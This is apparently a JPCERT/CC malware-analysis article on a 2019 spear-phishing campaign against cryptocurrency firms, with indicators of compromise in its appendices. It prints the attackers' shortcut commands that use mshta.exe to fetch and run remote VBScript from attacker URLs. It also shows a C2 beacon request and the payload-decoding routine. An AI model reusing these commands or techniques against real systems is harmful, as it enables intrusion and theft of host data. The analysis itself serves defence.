Spear Phishing against Cryptocurrency Businesses

As of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain a URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file. This article will describe the details of the attack method.

How the VBScript downloader is launched

The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.

Figure 1: Flow of events from running the shortcut file to infecting a host
Figure 1: Flow of events from running the shortcut file to infecting a host

The shortcut file contains the following command:

C:\Windows\System32\mshta.exe https://bit.ly/31O88c3

When a user accesses the shortened URL, they will be redirected to the following site, and an HTML file containing the VBScript (Figure 2) is downloaded.

http://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D

Figure 2: HTML file downloaded by the shortcut file
Figure 2: HTML file downloaded by the shortcut file

The behaviour of the VBScript is described in Figure 3. First, it creates and displays a text file that contains the password for the decoy document. Then, it creates a VBS file (oezjrjua.vbs) in %TEMP% directory and executes it. It also lists the processes running in the environment and checks whether any of them contains specific strings ("hudongf" or "qhsafe"). If these are not included, then a shortcut file (xBoxOne.lnk) is created in the Startup folder. It is assumed that this process is meant to check strings that Qihoo 360 security products contain (zhudongfangyu.exe, qhsafemain.exe).

Figure 3: Behaviour of VBScript in the HTML file
Figure 3: Behaviour of VBScript in the HTML file

Details of xBoxOne.lnk

xBoxOne.lnk is a shortcut file and contains the following command:

C:\Windows\System32\mshta.exe https://bit.ly/2SGs76y

When a user accesses the shortened URL, they will be redirected to the following site:

http://update.gdrives.top:8080/open?id=b7hMO0D%2ByNbNZSqXu4Putub%2BZLLqg/S66Foz0YKUjety914cQmWz32MV6BE44pEd

This shortcut file is created in the Startup folder and executed when the login is processed. As of 26 June 2019, JPCERT/CC was not able to confirm the details of the site as the hostname could not be resolved.

Details of oezjrjua.vbs

oezjrjua.vbs is a downloader which sends a POST request every 3 minutes and executes the received data as VBScript. The following is an example.

POST /open?topics=s9[random 3-digit numeric]
HTTP/1.1
Accept: */*
Accept-Language: ja
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 75.133.9.84:8080
Content-Length: 7426
Connection: Keep-Alive
Cache-Control: no-cache

200

Details of VBScript downloaded by oezjrjua.vbs

JPCERT/CC has confirmed that the VBScript (Figure 4) is received and executed in response to the POST request from oezjrjua.vbs.

Figure 4:VBScript executed by oezjrjua.vbs (snipped)
Figure 4:VBScript executed by oezjrjua.vbs (snipped)

The executed VBScript collects information of the infected device and sends it to the attacker’s server every minute. The following information is sent:

  • Username
  • Host name
  • OS version
  • OS install date
  • OS run time
  • Time zone
  • CPU name
  • Execution path of oezjrjua.vbs
  • Network adapter information
  • List of running processes

If the response to the data contains “20”, encoded data will be downloaded. It can be decoded with the following codes:

n=InStr(1,res,"#")                   // Finds # in the response
key=CLng("&h" & Mid(res,1,n-1))   // Extract the  key
psc=Mid(ret,n+1,Len(res)-n)        // Extracts encoded data
sc=base64dec(psc)                    // Base64 decoding (1st time)
psc=CStr(xor(sc,key))               // XOR processing on the key
NStep=base64dec(psc)                // Base64 decoding (2nd time)

The decoded data is expected to be VBScript, and it will be executed when it is correctly decoded. As of now, we have no clue about what kind of malware will be downloaded as a result since the encoded data is not accessible. It is assumed that attackers would inject some malicious files according to the victim’s environmental information .

Access to the shortened URL

JPCERT/CC observed a limited number of access to the shortened URL (Figure 5). This implies that the attack was conducted against a very limited range of targets.

Figure 5: Access counts to the shortened URL (snipped)
Figure 5: Access counts to the shortened URL (snipped)

In closing

In this series of attacks, we have observed that attackers change some parts of encoding and conditions for each attempt. It is likely that this type of attack continues with some customisation. Details about the shortcut file is available in Appendix A, list of samples in Appendix B and C&C servers in Appendix C.

The hash values and C&C servers of some variants are listed in Appendix D and E . Please make sure that none of your devices is communicating to the C&C servers listed in Appendix C or E. These samples were mostly decoy documents with subjects about cryptocurrency. We are aware that some of these documents have been sent to organisations that are related to cryptocurrencies. We assume that this attack campaign specifically targets cryptocurrency operators and related entities.

Tomoaki Tani
(Translated by Yukako Uchida)

Appendix A Shortcut file information

Table 1: Information contained in the shortcut file 1
Drive serial number fe42-66e0
NetBIOS name desktop-6hpdfg4
MAC address 94:b8:6d:42:68:1d
Table 2: Information contained in the shortcut file 2
Drive serial number 1aee-e0bd
NetBIOS name desktop-m9r59ro
MAC address 74:27:ea:25:d6:11

Appendix B SHA-256 Hash value of the samples

  • 71346d2cb7ecf45d7fe221ede76da51a2ecb85110b9b27f1cb64c30f9af69250
  • 01b5cd525d18e28177924d8a7805c2010de6842b8ef430f29ed32b3e5d7d99a0
  • 10ce173cfe83321b44139e3d7d20c5ac1a9c1c99882387af0fdbadcfa2597651
  • dc5f81c5bf0f5905ff2b6bdc4e1171fc41ad736da265801a64bb821bd76eace9
  • 9ad472872ba20c66fad56b7340ae869ff4d6708a2d0fc275a0faaded6ab7b507
  • de7fde10fabf91c03cdd894e40a19e664a9f9866932a801e57f1b79088847ebd
  • 4ecab0f81a2da70df5f2260bab7c8c130b200dbfe2bbd8e3d1845ff0c93c7861
  • e982a70cb21c915d847925bd364d6d87f02eac135eac3ba80ad448700e1ae9a7

Appendix C List of C&C servers

  • service.amzonnews.club
  • 75.133.9.84
  • update.gdrives.top
  • googledrive.network

Appendix D SHA-256 Hash value of the similar samples

  • 901eca85c5711a53e53c48309b3afd34cbb014c91a20f8f716ee21832c7cd5e0
  • c60aedbb20fdea048fa2d4b3bdc520f9f9b9172ee16c01dac19b33781b1bdb1d
  • 7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6
  • 1533374acf886bc3015c4cba3da1c67e67111c22d00a8bbf7694c5394b91b9fc
  • b077edc8d08796cdff8b75e5cb66e0191510a559941b431e38040e51b6607876
  • 997c4f7695a6a615da069d5f839582fdb83f215bc999e8af492636b2b5e3436c
  • a464781b616c86bbd68dbf909826444f7fd6c6ae378caf074926df7aebc4e3a1

Appendix E C&C servers of the similar samples

  • drverify.dns-cloud.net
  • docs.googlefiledrive.com
  • europasec.dnsabr.com
  • eu.euprotect.net
  • 092jb_378v3_1.googldocs.org
  • gbackup.gogleshare.xyz
  • drive.gogleshare.xyz
Back
Top